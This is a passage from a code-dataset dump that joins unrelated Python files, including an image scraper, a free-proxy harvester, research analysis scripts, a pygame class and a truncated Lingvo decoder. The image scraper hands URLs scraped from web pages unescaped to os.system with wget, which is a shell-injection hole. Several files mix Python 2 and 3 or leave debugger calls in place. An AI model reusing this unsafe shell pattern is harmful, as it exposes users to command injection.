main(sys.argv)\n","sub_path":"Week2/Code/oaks_debugme.py","file_name":"oaks_debugme.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"596000270","text":"# -*- coding: utf-8 -*- \n\nimport urllib\nimport urllib2\nimport os\nimport sys\nimport datetime\nimport struct\nimport urllib.request\nfrom HTMLParser import HTMLParser\nimport time\n\n\ndef parse_jpeg(res):\n while not res.closed:\n (marker, size) = struct.unpack('>2sH', res.read(4))\n if marker == b'\\xff\\xc0':\n (_,height,width,_) = struct.unpack('>chh10s', res.read(size-2))\n return (width,height)\n else:\n res.read(size-2)\n\ndef parse_png(res):\n (_,width,height) = struct.unpack(\">14sII\", res.read(22))\n return (width, height)\n\ndef parse_gif(res):\n (_,width,height) = struct.unpack(\"<4sHH\", res.read(8))\n return (width, height)\n\ndef get_image_size(url):\n res = urllib.request.urlopen(url)\n size = (-1,-1)\n if res.status == 200:\n signature = res.read(2)\n if signature == b'\\xff\\xd8':#jpg\n size = parse_jpeg(res)\n elif signature == b'\\x89\\x50':#png\n size = parse_png(res)\n elif signature == b'\\x47\\x49':#gif\n size = parse_gif(res)\n res.close()\n return size\n\n\ndef download(url):\n\n my_files = os.listdir('./')\n d_file = os.path.basename(url)\n \n for file in my_files:\n if d_file == file:\n print (\"you already have it\")\n return False\n\n if not url.endswith('g') or url.endswith('f'):\n return False\n\n # file = cStringIO.StringIO(urllib.urlopen(url).read())\n # image = Image.open(file)\n width, height = get_image_size(url)\n\n b = len(urllib.urlopen(url).read()) > 20000 and height > 200 and width > 200\n # localfile = open(os.path.basename(url),'wb')\n # localfile.write(urllib.urlopen(url).read())\n # localfile.close \n \n return b\n\nclass imgParser(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n\n def handle_starttag(self,tagname,attribute):\n if tagname.lower() == \"img\":\n for i in attribute:\n if i[0].lower() == \"src\":\n img_url=i[1]\n # 取得した写真のURLを集めたファイルの作成\n f = open(\"collection_url.txt\",\"a\")\n f.write(\"%s\\t\"%img_url)\n f.close()\n\nif __name__ == \"__main__\":\n\n #print('写真を取得したいサイトのURLを入力してください。')\n argc = len(sys.argv)\n input_url = sys.argv[1]\n htmldata = urllib2.urlopen(input_url)\n\n if argc == 3:\n folder_name = sys.argv[2]\n else:\n folder_name = datetime.datetime.today().strftime(\"%Y%m%d_%H:%M\")\n os.mkdir(\"./img/{0}\".format(folder_name))\n\n os.chdir(\"./img/{0}\".format(folder_name))\n \n\n print('start')\n start = time.time()\n\n parser = imgParser()\n parser.feed(htmldata.read())\n\n parser.close()\n htmldata.close()\n\n # 生成したファイルの読み込み\n f = open(\"collection_url.txt\",\"r\")\n for row in f:\n row_url = row.split('\\t')\n len_url = len(row_url)\n f.close()\n\n number_url = []\n\n for i in range(0,(len_url-1)):\n number_url.append(row_url[i])\n\n for j in range(0,(len_url-1)):\n print (j,)\n url = number_url[j]\n if download(url):\n os.system('wget --quiet {1}'.format(folder_name, url))\n print (\"ok\")\n print('complete')\n elapsed_time = time.time() - start\n print(\"elapsed_time:{0}\".format(elapsed_time))\n\n # ファイルの削除\n os.remove(\"collection_url.txt\")","sub_path":"forreference/getimage_wget.py","file_name":"getimage_wget.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"399264314","text":"\nfrom utils import save_dir, data_dir, train_pool, analyze_dir,save_dict\nfrom utils.analysis_utils import analyze_pool\nimport pickle\nimport os\nimport re\nimport numpy as np\nimport argparse\nimport fnmatch\nparser = argparse.ArgumentParser(description='run mftma and save results')\nparser.add_argument('model_id', type=str, default='NN-tree_nclass=64_nobj=64000_nhier=6_beta=0.02_sigma=0.83_nfeat=3072-train_test-fixed')\nparser.add_argument('analyze_id', type=str, default='mftma-exm_per_class=50-proj=False-rand=False-kappa=0-n_t=300-n_rep=1')\nparser.add_argument('train_id', type=str, default='')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n model_identifier = args.model_id\n analyze_identifier = args.analyze_id\n train_dir_identifier = args.train_id\n params = train_pool[model_identifier]()\n layer_names = params.get_layer_names()\n model_identifier_for_saving = params.identifier.translate(str.maketrans({'[': '', ']': '', '/': '_'}))\n\n analyze_params = analyze_pool[analyze_identifier]()\n analyze_identifier_for_saving = analyze_params.identifier.translate(str.maketrans({'[': '', ']': '', '/': '_'}))\n # find layers\n # manually walk through the files\n covar_files = []\n for file in os.listdir(os.path.join(analyze_dir, analyze_identifier_for_saving,model_identifier_for_saving,train_dir_identifier)):\n if fnmatch.fnmatch(file, '*_center_covar.pkl'):\n covar_files.append(os.path.join(analyze_dir, analyze_identifier_for_saving,model_identifier_for_saving,train_dir_identifier, file))\n s = [re.findall('/\\d+', x) for x in covar_files]\n s = [item for sublist in s for item in sublist]\n file_id = [int(x.split('/')[1]) for x in s]\n sorted_files = [covar_files[x] for x in np.argsort(file_id)]\n\n # do layerwise saving\n covar_pooled = dict()\n for idx, layer in enumerate(layer_names):\n s = np.asarray([int(not not re.findall(layer, x)) for x in sorted_files])\n layer_files=[sorted_files[int(x)] for x in np.argwhere(s)]\n x_idx=np.argwhere(s)\n layer_results=[]\n for id_file, file in enumerate(layer_files):\n data_=pickle.load(open(file, 'rb'))\n assert(data_['layer_name']==layer)\n s =re.findall('-batchidx=\\d+', file)\n batchidx = [int(x.split('=')[1]) for x in s][0]\n s = re.findall('-epoch=\\d+', file)\n epochidx = [int(x.split('=')[1]) for x in s][0]\n\n layer_results.append(dict(center_covar=data_['covar_results'], epoch=epochidx, batch=batchidx,\n seq=id_file,train_acc=data_['train_acc'],test_acc=data_['test_acc'] , file=file))\n covar_pooled[layer]=layer_results\n pool_file = os.path.join(analyze_dir,analyze_identifier_for_saving,model_identifier_for_saving,train_dir_identifier, f'{model_identifier_for_saving}_center_covar_pooled.pkl')\n d_master = {'analyze_identifier': analyze_identifier,\n 'model_identifier': model_identifier,\n 'train_identifier': train_dir_identifier,\n 'center_covar_results': covar_pooled,\n 'file_generated': pool_file}\n save_dict(d_master, pool_file)\n print('saved '+pool_file)\n print('done')\n\n\n\n\n\n\n\n","sub_path":"center_covar_pool_results.py","file_name":"center_covar_pool_results.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149315870","text":"# Third party\n\n# Local\nfrom reference_resolver import main as rr\n\ncitation = 'Senís, Elena, et al. \"CRISPR/Cas9‐mediated genome engineering: An adeno‐associated viral (AAV) vector ' + \\\n 'toolbox. Biotechnology journal 9.11 (2014): 1402-1412.'\n\nlink = 'http://onlinelibrary.wiley.com/doi/10.1002/biot.201400046/references'\n\ndoi = '10.1002/biot.201400046'\n\ndoi = '10.1016/S0304-3991(00)00076-0'\n\n#paper_info = rr.resolve_citation(citation)\n#print(paper_info['entry'])\n#print(paper_info['references'][0])\n#print(paper_info.keys())\n\n#paper_info = rr.resolve_doi(doi)\n\ndoi = '10.1038/nrg3686'\n\npaper_info = rr.paper_info_from_doi(doi, skip_saved=True)\nreferences = paper_info.references\n\n#print(refs)\n#print(len(refs))\n'''\nsession = Session()\n\nmainentry = session.query(tables.MainPaperInfo).all()\nrefs = session.query(tables.References).all()\nmapping = session.query(tables.RefMapping).all()\n'''\n\nimport pdb\npdb.set_trace()\n","sub_path":"ref_resolve_test_code.py","file_name":"ref_resolve_test_code.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7258731","text":"from urllib import request as ur\nfrom lxml import etree\n\npagenum = 1\nresed = ur.urlopen(url='http://www.httpbin.org/ip').read().decode() # 当前访问的ip\n\nwhile True:\n url = 'https://www.kuaidaili.com/free/intr/' + str(pagenum) # ip 站点爬取ip 的分页\n pagenum += 1 # 循环爬取\n res = ur.urlopen(url=url).read().decode() # 询函获取每个页面\n ele = etree.HTML(res) # 解析html文档\n ips = ele.xpath(\"//td[@data-title='IP']/text()\") # 获取ip\n ports = ele.xpath(\"//td[@data-title='PORT']/text()\") # 获取端口\n types = ele.xpath(\"//td[@data-title='类型']/text()\") # 获取类型 html ……\n proxy = {}\n for i in range(len(ips)):\n proxy[types[i].lower()] = ips[i] + ':' + ports[i] # 以键值对的形式保存\n handler = ur.ProxyHandler(proxy) # urllib 的代理\n opener = ur.build_opener(handler) # 创建opener 对象 支持更多功能\n print(proxy)\n try:\n now_res = opener.open('http://www.httpbin.org/ip', timeout=3).read().decode() # 设置超时\n print(resed)\n print(now_res)\n if resed != now_res: # 如果是可用 ip 保存 写入文件\n with open('proxy1.txt', 'a+', encoding='utf-8') as w:\n w.write(str(proxy) + '\\n')\n proxy = {}\n\n except:\n proxy = {}\n","sub_path":"Replace/晨讲/珍爱网/ip_pools/get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"220439244","text":"#analyze quadruplet data using hierarchical MAPDS\n#this is using Selim's data as proof of concept. Will have to rewrite data handling.\nfrom glob import glob\nimport os\nfrom os.path import join\nimport numpy as np\nimport pickle\nimport pystan\nfrom pystan import StanModel\nfrom ipdb import set_trace\n\nif __name__ == '__main__':\n #where to find data, also look for subjects.\n dataDir = r'C:\\Users\\neugebauer\\Documents\\Experiments\\graveyard\\adap_MAPDS\\testData'\n subDirs = glob(join(dataDir,'s*'))\n\n #unpickel model\n modPath = r'C:\\Users\\neugebauer\\Documents\\Experiments\\MAPDS\\stanModels\\hierModel.pic'\n model = pickle.load(open(modPath,'rb'));\n\n #prepare empty arrays for data, infer every necessary piece of information before.\n nTrial = 216 \n nStim = 8\n nFreeStim = nStim - 2\n nSub = len(subDirs)\n fixPos = [(0.,1.),(0.,-1.)]\n\n resp = np.zeros((nTrial,nSub))\n stimlist = np.zeros((nTrial,4,nSub))\n\n #these are the necessary parameters\n #int \t\tnTrial; //number of trials - this is assuming the same number for everyone\n ###int \t\tnStim; //all stimuli including fixed ones.\n #int nSub; //number of subjects \n #int nFreeStim; //only the number of free parameters\n #matrix[2,2] \t\t\t\tfixPos; //two fixed point: The first one and the fifth one.\n #int\tresp[nTrial,nSub]; //vector of responses that where given\n #int\tstimlist[nTrial,4,nSub]; //the stimlist that was being used, one per subject. Might be easier to use one for all, we'll see.\n\n #load data for each subject, combine responses\n for sub,path in enumerate(subDirs):\n try:\n data = pickle.load(open(join(path,'data.pic'),'rb'));\n stimlist[:,:,sub] = data['phase2']['stimlist'][0:nTrial,:]\n resp[:,sub] = data['phase2']['responses'][0:nTrial].squeeze()\n except:\n pass\n del data\n #prepare da dict for pystan\n data = {'nTrial': nTrial, 'nStim': nStim, 'nSub': nSub, 'nFreeStim': \n nFreeStim, 'fixPos': fixPos, 'resp': resp.astype(int), 'stimlist': \n stimlist.astype(int)}\n #function to generate initial values\n def init():\n '''\n Stan behavior is more predictable and we need less runs if we choose\n sensible values to initialize the process. This can be either be done\n by giving a list of dicts for initial values, one dict per chain you \n want to run. Or you give a function that returns a dict of initial \n values and then Pystan calls it as often as necessary to produce \n starting values for all chains you want to run.by giving a function that\n produces as many dicts as necessary for all chains. This here is the \n function for the hierarchical model. We use this approach because it is\n more flexible and agnostic towards the number of chains to be used. \n\n These are the parameters that need to be estimated and thus initialized\n matrix[nFreeStim,2] freePosSub[nSub]; \n matrix[nFreeStim,2] freePosMu; \n real freePosSigma; \n real sigma[nSub]; \n '''\n #angles from 0 to 315 degrees as radians\n ang = np.deg2rad(np.linspace(0,360,nStim +1)[:-1])\n #free positions of perfect circle without noise as starting values for\n #the group level positions. Will add some noise later\n freePosMu = np.delete(np.array([np.sin(ang),np.cos(ang)]).T,[0,4],0)\n #party people, make some noise! These are noise circles for subjects\n freePosSub = [(freePosMu + np.random.randn(*freePosMu.shape)).tolist()\\\n for _ in range(nSub)]\n #sigma of free positions, i.e how much do people differ?\n freePosSigma = np.random.rand() * 0.2\n #individual noise term for likelihood function\n sigma = [np.random.rand()*0.2 for _ in range(nSub)]\n #add some noise to the group level. Just a bit though.\n freePosMu += (np.random.randn(*freePosMu.shape) * 0.05).tolist()\n initDict = {'freePosSub': freePosSub,'freePosMu': freePosMu, \n 'freePosSigma': freePosSigma,'sigma': sigma}\n return initDict\n\n #run Model\n counter = 0\n success = False\n while counter < 100 and not success:\n try:\n print('Run # {}'.format(counter))\n fit = model.sampling(data,chains=1,init='0')#,init = init);\n set_trace()\n print('Done.')\n print('sucessful run in run # {}'.format(counter))\n with open('successfullFit.pic','wb') as f:\n pickle.dump(fit,f,-1)\n success = True\n except:\n counter +=1\n try:\n opt = model.optimizing(data)\n set_trace()\n print('optimizing worked.')\n with open('successfullyOptimized.pic','wb') as f:\n pickle.dump(opt,f,-1)\n except:\n pass\n","sub_path":"analysis/runHierarchModel.py","file_name":"runHierarchModel.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23992525","text":"\nimport os\nimport numpy as np\nimport json\n#from ipywidgets import interact\nimport matplotlib.pyplot as plt\nimport torch\nimport random\nimport re\nfrom tqdm import tqdm\nfrom espnet.asr.pytorch_backend.asr import load_trained_model\n\nimport matplotlib\n#matplotlib.use('TkAgg')\n\n\ni = 30\nmodel, train_args = load_trained_model(f'exp/train_pytorch_wav2vecfexlgcn/results/snapshot.ep.{i}')\ndevice = torch.device('cuda')\nmodel = model.float()\nmodel = model.to(device)\n\nwith open('dump/train/deltafalse/data.json.npy') as f:\n js = json.load(f)['utts']\n \ndef get_lang(d):\n s = d.split('_')[0]\n s = re.sub(r'\\d+$', '', s.split('-')[0]) if re.search('[a-zA-Z]+', s) else s\n return s\n\ndef to_onehot(ys):\n uniq = sorted(list(np.unique(ys)))\n \n out = np.zeros((len(ys), len(uniq)))\n l2int = {l: i for i, l in enumerate(uniq)}\n print(l2int)\n for i, l in enumerate(ys):\n out[i, l2int[l]] = 1\n return out\n\ndef to_int(ys):\n uniq = sorted(list(np.unique(ys)))\n \n# out = np.zeros((len(ys), len(uniq)))\n l2int = {l: i for i, l in enumerate(uniq)}\n print(l2int)\n out = np.array([l2int[l] for i, l in enumerate(ys)])\n return out\nn_sample = 1000\nframe_ratio = 0.1\n\nxs = []\nys = []\nrandom.seed(2)\nwith torch.no_grad():\n for k, v in tqdm(random.sample(js.items(), n_sample)):\n lang = get_lang(k)\n x = torch.FloatTensor(np.load(v['input'][0]['feat'])).to(device)\n features = model.encode(x, lang_labels=['N'])\n \n features = features.squeeze(0).detach().cpu().numpy()\n T, d = features.shape\n n_frame = int(frame_ratio * T)\n ys.extend([lang] * n_frame)\n idx = random.sample(list(range(T)), n_frame)\n xs.append(features[idx])\n# break\n xs = np.vstack(xs)\n \n \nX = np.array(xs)\nY = to_int(ys)\nprint(X.shape, Y.shape)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import accuracy_score, f1_score\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=1)\n\nclf = LinearSVC(random_state=0).fit(X_train, y_train)\ny_pred = clf.predict(X_test)\n\nfrom pprint import pprint\nuniq = sorted(list(np.unique(ys)))\n\nacc = accuracy_score(y_test, y_pred)\nf1_macro = f1_score(y_test, y_pred, average='macro')\nf1_micro = f1_score(y_test, y_pred, average='micro')\nf1 = f1_score(y_test, y_pred, average=None)\n\nprint('acc', acc, 'f1_macro', f1_macro, 'f1_micro', f1_micro)\npprint(list(zip(uniq, f1)))\n","sub_path":"egs/low-resource-language/asr1-cross/acc.py","file_name":"acc.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"435026677","text":"# -*- coding: utf-8 -*-\nimport pygame\nfrom pygame.sprite import Sprite\n\nclass Ship(Sprite):\n\n def __init__(self, ai_settings, screen):\n \"\"\"初始化飞船并设置其位置\"\"\"\n super(Ship,self).__init__()\n self.screen = screen\n self.ai_settings = ai_settings\n # 以下是加载飞船的图像并获取其外接矩形\n self.image = pygame.image.load(\"images/ship.bmp\")\n self.rect = self.image.get_rect() # 获取飞船图像外界矩阵\n self.screen_rect = screen.get_rect() # 获取窗口外接矩阵\n # 将每搜新飞船放在屏幕底部中央\n self.rect.centerx = self.screen_rect.centerx # 将飞船中央放在窗口中央\n self.rect.bottom = self.screen_rect.bottom # 将飞船底部放在窗口底部\n # 在每艘船的属性center中存储小数值\n self.center = float(self.rect.centerx)\n # 设置移动的标志,也就是玩家按下右键是的标志\n self.moving_right = False\n self.moving_left = False\n\n\n\n def update(self):\n if self.moving_right and self.rect.rightself.screen_rect.left:\n self.center -= self.ai_settings.ship_speed_factor\n\n self.rect.centerx = self.center\n\n def blitme(self):\n # 根据上述指定位置绘制飞船\n self.screen.blit(self.image, self.rect) # 传入飞船外接矩阵,有了外界矩阵就可以找到上述设定的参数\n\n def center_ship(self):\n \tself.center=self.screen_rect.centerx\n\n","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554333508","text":"# This file is part of pycopancore.\n#\n# Copyright (C) 2016 by COPAN team at Potsdam Institute for Climate\n# Impact Research\n#\n# URL: \n# License: MIT license\n\n\"\"\"\npycopancore\n===========\n\nSubpackages\n-----------\n\nNone yet.\n\n\"\"\"\n\n\n__author__ = \"Jonathan F. Donges \"\n__copyright__ = \\\n \"Copyright (C) 2016 Jonathan F. Donges and COPAN team\"\n__license__ = \"MIT license\"\n__url__ = \"http://www.pik-potsdam.de/copan/software\"\n__version__ = \"0.1.0\"\n__date__ = \"2016-05-30\"\n__docformat__ = \"restructuredtext en\"\n","sub_path":"pycopancore/individuals/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"192960467","text":"# Lint as: python3\n# Copyright 2018 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Common decoder interface.\"\"\"\n\nimport collections\n\nimport lingvo.compat as tf\nfrom lingvo.core import base_layer\nfrom lingvo.core import beam_search_helper\nfrom lingvo.core import py_utils\nfrom lingvo.core import target_sequence_sampler\n\n# metrics: Dict[Text, Tuple[float, float]] A dict of named metrics, which must\n# include 'loss'. The value of the dict is (metric_val, count), where\n# metric_val is the sum of the metric over all examples, and count is the\n# number of examples seen. The mean value of the metric is metric_val/count.\n# This is the first output of ComputeLoss.\n# predictions: Union[Tensor, Dict[Text, Tensor], NestedMap] This is the output\n# of ComputePredictions.\n# per_sequence: Dict[Text, Tensor] This is the second output of ComputeLoss.\nDecoderOutput = collections.namedtuple(\n 'DecoderOutput',\n ['metrics', 'predictions', 'per_sequence'],\n)\n\n\nclass BaseDecoder(base_layer.BaseLayer):\n \"\"\"Base class for all decoders.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define(\n 'packed_input', False, 'If True, decoder and all layers support '\n 'multiple examples in a single sequence.')\n return p\n\n @classmethod\n def UpdateTargetVocabSize(cls, p, vocab_size, wpm_model=None):\n \"\"\"Sets the vocab size and wpm model in the params.\n\n Args:\n p: model params.\n vocab_size: size of the vocabulary.\n wpm_model: file name prefix pointing to a wordpiece model.\n\n Returns:\n Model target vocabulary params updated with the vocab size and wpm model.\n \"\"\"\n raise NotImplementedError('Abstract method')\n\n def FProp(self, theta, encoder_outputs, targets):\n \"\"\"Decodes `targets` given encoded source.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n encoder_outputs: a NestedMap computed by encoder.\n targets: A NestedMap containing additional inputs to the decoder,\n such as the targets being predicted.\n\n Returns:\n A DecoderOutput namedtuple.\n \"\"\"\n predictions = self.ComputePredictions(theta, encoder_outputs, targets)\n metrics, per_sequence = self.ComputeLoss(theta, predictions, targets)\n return DecoderOutput(\n metrics=metrics, predictions=predictions, per_sequence=per_sequence)\n\n def ComputePredictions(self, theta, encoder_outputs, targets):\n raise NotImplementedError('Abstract method: %s' % type(self))\n\n def ComputeLoss(self, theta, predictions, targets):\n raise NotImplementedError('Abstract method: %s' % type(self))\n\n\nclass BaseBeamSearchDecoder(BaseDecoder):\n \"\"\"Decoder that does beam search.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('target_sos_id', 1, 'Id of the target sequence sos symbol.')\n p.Define('target_eos_id', 2, 'Id of the target sequence eos symbol.')\n # TODO(rpang): remove target_seq_len and use beam_search.target_seq_len\n # instead.\n p.Define('target_seq_len', 0, 'Target seq length.')\n p.Define('beam_search', beam_search_helper.BeamSearchHelper.Params(),\n 'BeamSearchHelper params.')\n p.Define('greedy_search', beam_search_helper.GreedySearchHelper.Params(),\n 'GreedySearchHelper params.')\n p.Define('target_sequence_sampler',\n target_sequence_sampler.TargetSequenceSampler.Params(),\n 'TargetSequenceSampler params.')\n p.Define(\n 'bias_only_if_consistent', True, 'BeamSearchBiased bias is only'\n 'applied if the hypothesis has been consistent with targets so far.')\n return p\n\n @classmethod\n def UpdateTargetVocabSize(cls, p, vocab_size, wpm_model=None):\n \"\"\"Sets the vocab size and wpm model in the params.\n\n Args:\n p: model params.\n vocab_size: size of the vocabulary.\n wpm_model: file name prefix pointing to a wordpiece model.\n\n Returns:\n Model target vocabulary params updated with the vocab size and wpm model.\n \"\"\"\n raise NotImplementedError('Abstract method')\n\n def __init__(self, params):\n super().__init__(params)\n p = self.params\n p.beam_search.target_seq_len = p.target_seq_len\n p.beam_search.target_sos_id = p.target_sos_id\n p.beam_search.target_eos_id = p.target_eos_id\n self.CreateChild('beam_search', p.beam_search)\n p.greedy_search.target_seq_len = p.target_seq_len\n p.greedy_search.target_sos_id = p.target_sos_id\n p.greedy_search.target_eos_id = p.target_eos_id\n self.CreateChild('greedy_search', p.greedy_search)\n p.target_sequence_sampler.target_seq_len = p.target_seq_len\n p.target_sequence_sampler.target_sos_id = p.target_sos_id\n p.target_sequence_sampler.target_eos_id = p.target_eos_id\n self.CreateChild('target_sequence_sampler', p.target_sequence_sampler)\n\n def AddExtraDecodingInfo(self, encoder_outputs, targets):\n \"\"\"Adds extra decoding information to encoded_outputs.\n\n Args:\n encoder_outputs: a NestedMap computed by encoder.\n targets: a NestedMap containing target input fields.\n\n Returns:\n encoder_ouputs with extra information used for decoding.\n \"\"\"\n return encoder_outputs\n\n def BeamSearchDecode(self, encoder_outputs, num_hyps_per_beam_override=0):\n \"\"\"Performs beam search based decoding.\n\n Args:\n encoder_outputs: the outputs of the encoder.\n num_hyps_per_beam_override: If set to a value <= 0, this parameter is\n ignored. If set to a value > 0, then this value will be used to override\n p.num_hyps_per_beam.\n\n Returns:\n `.BeamSearchDecodeOutput`, A namedtuple whose elements are tensors.\n \"\"\"\n return self.BeamSearchDecodeWithTheta(self.theta, encoder_outputs,\n num_hyps_per_beam_override)\n\n def BeamSearchDecodeWithTheta(self,\n theta,\n encoder_outputs,\n num_hyps_per_beam_override=0):\n return self.beam_search.BeamSearchDecode(theta, encoder_outputs,\n num_hyps_per_beam_override,\n self._InitBeamSearchStateCallback,\n self._PreBeamSearchStepCallback,\n self._PostBeamSearchStepCallback)\n\n def GreedySearchDecode(self, encoder_outputs):\n \"\"\"Performs beam search based decoding.\n\n Args:\n encoder_outputs: the outputs of the encoder.\n\n Returns:\n greedy search decode output.\n \"\"\"\n return self.GreedySearchDecodeWithTheta(self.theta, encoder_outputs)\n\n def GreedySearchDecodeWithTheta(self, theta, encoder_outputs):\n return self.greedy_search.GreedySearchDecode(\n theta, encoder_outputs,\n self._InitBeamSearchStateCallback,\n self._PreBeamSearchStepCallback,\n self._PostBeamSearchStepCallback)\n\n def SampleTargetSequences(self, theta, encoder_outputs, random_seed):\n \"\"\"Performs target sequence sampling.\n\n Args:\n theta: A NestedMap object containing weights' values of this layer and its\n children layers.\n encoder_outputs: a NestedMap computed by encoder.\n random_seed: a scalar int32 tensor representing the random seed.\n\n Returns:\n A NestedMap containing the following tensors\n\n - 'ids': [batch, max_target_length] of int32, representing the target\n sequence ids, not including target_sos_id, but maybe ending with\n target_eos_id if target_eos_id is sampled.\n - 'paddings': [batch, max_target_length] of 0/1, where 1 represents\n a padded timestep.\n \"\"\"\n return self.target_sequence_sampler.Sample(\n theta, encoder_outputs, random_seed, self._InitBeamSearchStateCallback,\n self._PreBeamSearchStepCallback, self._PostBeamSearchStepCallback)\n\n def BeamSearchDecodeBiased(self,\n encoder_outputs,\n num_hyps_per_beam_override=0):\n \"\"\"Performs beam-search decoding while biasing towards provided targets.\n\n Args:\n encoder_outputs: a NestedMap computed by encoder. Must include `targets`,\n which is used to bias beam search.\n num_hyps_per_beam_override: If set to a value <= 0, this parameter is\n ignored. If set to a value > 0, then this value will be used to override\n `p.num_hyps_per_beam`.\n\n Returns:\n BeamSearchDecodeOutput, a namedtuple containing the decode results.\n \"\"\"\n p = self.params\n\n targets = encoder_outputs.targets\n targets.weights *= (1.0 - targets.paddings)\n\n def PadToTargetSeqLen(tensor, constant):\n length = tf.shape(tensor)[1]\n pad = tf.maximum(0, p.beam_search.target_seq_len - length)\n return tf.pad(tensor, [[0, 0], [0, pad]], constant_values=constant)\n\n targets.labels = PadToTargetSeqLen(targets.labels, 0)\n targets.weights = PadToTargetSeqLen(targets.weights, 0)\n\n def InitBeamSearchStateCallback(theta, encoder_outputs, num_hyps_per_beam):\n \"\"\"Wrapper for adding bias to _InitBeamSearchStateCallback.\n\n Exapnds state to track consistency of hypothesis with provided target.\n\n Args:\n theta: A NestedMap object containing weights' values of this layer and\n its children layers.\n encoder_outputs: A NestedMap computed by encoder.\n num_hyps_per_beam: An int, number hyps to keep for source sentence.\n\n Returns:\n initial_results: a `.NestedMap` of initial results.\n states: a `.NestedMap` of initial model states that the client\n would like to keep track of for each hyp. The states relevant here\n are:\n time_step: A scalar indicating current step (=0 for initial state) of\n decoder. Must be provided and maintained by super.\n consistent: A boolean tensor of shape [tgt_batch, 1] which tracks\n whether each hypothesis has exactly matched\n encoder_outputs.targets\n so far.\n \"\"\"\n initial_results, states = self._InitBeamSearchStateCallback(\n theta, encoder_outputs, num_hyps_per_beam)\n assert hasattr(states, 'time_step')\n if tf.is_tensor(encoder_outputs.padding):\n batch_size = tf.shape(encoder_outputs.padding)[1]\n else: # Required for multisource models.\n batch_size = tf.shape(list(encoder_outputs.padding.values())[0])[1]\n num_hyps = batch_size * num_hyps_per_beam\n # states.consistent is initially all True\n states.consistent = tf.ones([\n num_hyps,\n ], dtype=tf.bool)\n return initial_results, states\n\n def PreBeamSearchStepCallback(theta, encoder_outputs, step_ids, states,\n num_hyps_per_beam, *args, **kwargs):\n \"\"\"Wrapper for adding bias to _PreBeamSearchStateCallback.\n\n Biases results.log_probs towards provided encoder_outputs.targets.\n\n Args:\n theta: a NestedMap of parameters.\n encoder_outputs: a NestedMap computed by encoder.\n step_ids: A tensor of shape [tgt_batch, 1].\n states: A `.NestedMap` of tensors representing states that the clients\n would like to keep track of for each of the active hyps.\n num_hyps_per_beam: Beam size.\n *args: additional arguments to _PreBeamSearchStepCallback.\n **kwargs: additional arguments to _PreBeamSearchStepCallback.\n\n Returns:\n A tuple (results, out_states).\n results: A `.NestedMap` of beam search results.\n atten_probs:\n The updated attention probs, of shape [tgt_batch, src_len].\n log_probs:\n Log prob for each of the tokens in the target vocab. This is of\n shape\n [tgt_batch, vocab_size].\n out_states: a `.NestedMap` The updated states. The states relevant here\n are:\n time_step: A scalar indicating current step of decoder. Must be\n provided and maintained by subclass.\n consistent: A boolean vector of shape [tgt_batch, ] which tracks\n whether each hypothesis has exactly matched\n encoder_outputs.targets\n so far.\n \"\"\"\n p = self.params\n time_step = states.time_step\n bs_results, out_states = self._PreBeamSearchStepCallback(\n theta, encoder_outputs, step_ids, states, num_hyps_per_beam, *args,\n **kwargs)\n labels = encoder_outputs.targets.labels\n weights = encoder_outputs.targets.weights\n\n def ApplyBias():\n \"\"\"Bias and update log_probs and consistent.\"\"\"\n\n def TileForBeamAndFlatten(tensor):\n tensor = tf.reshape(tensor, [1, -1]) # [1, src_batch]\n tensor = tf.tile(\n tensor, [num_hyps_per_beam, 1]) # [num_hyps_per_beam, src_batch]\n tgt_batch = tf.shape(step_ids)[0] # num_hyps_per_beam*src_batch\n return tf.reshape(tensor, [tgt_batch])\n\n # Consistent if step_ids == labels from previous step\n # TODO(navari): Consider updating consistent only if weights > 0. Then\n # re-evaluate the need for bias_only_if_consistent=True.\n # Note that prev_label is incorrrect for step 0 but is overridden later\n prev_label = TileForBeamAndFlatten(\n tf.gather(labels, tf.maximum(time_step - 1, 0), axis=1))\n is_step0 = tf.equal(time_step, 0)\n local_consistence = tf.math.logical_or(\n is_step0, tf.equal(prev_label, tf.squeeze(step_ids, 1)))\n consistent = tf.math.logical_and(states.consistent, local_consistence)\n\n # get label, weight slices corresponding to current time_step\n label = TileForBeamAndFlatten(tf.gather(labels, time_step, axis=1))\n weight = 